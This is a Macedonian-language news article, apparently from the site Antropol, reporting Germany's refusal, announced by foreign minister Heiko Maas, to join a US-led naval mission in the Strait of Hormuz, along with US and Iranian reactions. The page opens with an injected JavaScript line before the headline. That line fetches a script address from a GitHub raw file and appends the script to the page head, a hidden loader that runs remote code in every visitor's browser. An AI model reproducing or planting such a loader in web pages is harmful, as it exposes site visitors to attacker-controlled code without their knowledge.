;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Германија нема да учествува во иницијативата на САД против Иран за теснецот Хормуз - Антропол
АктуелноИнтернационално

Германија нема да учествува во иницијативата на САД против Иран за теснецот Хормуз

САД официјално побараа од Германија да учествува – заедно со Велика Британија и Франција – во поморските сили предводени од САД за наводно обезбедување на теснецот на Хормуз; барање кое еден ден подоцна беше одбиено од страна на германскиот министер за надворешни работи, Хајко Маас.

„Германија ќе oдбие да учествува во поморска мисија предводена од САД,“ објави министерот за надворешни работи, Хајко Маас. Тој рече дека „не може да има воено решение“ за тековната криза во Персискиот Залив. Говорејќи во Варшава, Маас рече дека Германија ќе го одбие барањето на Вашингтон што го достави американската амбасада во Берлин за заедничката американска, британска и француска операција која наводно е насочена кон заштита на морскиот сообраќај во теснецот Хормуз и борба против т.н. „иранска агресија“.

Не е изненадување тоа што Германија ќе одбие да ѝ помогне на мисијата предводена од САД. Барањето на Вашингтон беше предмет на интензивна дебата во Берлин, при што опозициските партии од лево и десно вршеа притисок врз коалициската влада на канцеларката Ангела Меркел да го одбие ова барање.

Мора да избегнеме понатамошна ескалација во теснецот Хормуз“, рече Маас. „Тоа секогаш беше наша позиција“, додаде тој. Во споредба со САД и некои нивни сојузници, Германија ужива релативно срдечни односи со Техеран уште од 1970-тите.

САД се поставија наспроти Германија поради одбивањето да се приклучат на мисијата на Персискиот Залив. Главниот амбасадор на САД во Германија се противи на Берлин затоа што одби да влезе во планот на САД за воспоставување поморска мисија во Персискиот Залив. 

Тој во интервју за германскиот весник „Augsburger Allgemeine“ рече дека Берлин има „глобални одговорности“ кои треба да ги исполни како најголема економија во Европа. Тој дури и имплицираше дека Германија ѝ е должна на Америка. Исламската Република Иран, исто така, отфрли какво било странско воено присуство во регионот, нагласувајќи дека само регионалните земји треба да обезбедат таква безбедност.

САД веќе се вклучија во воени подготовски за мисијата на Персискиот Залив, вклучително и со нарачување забрзано испраќање на носач на авиони во регионот.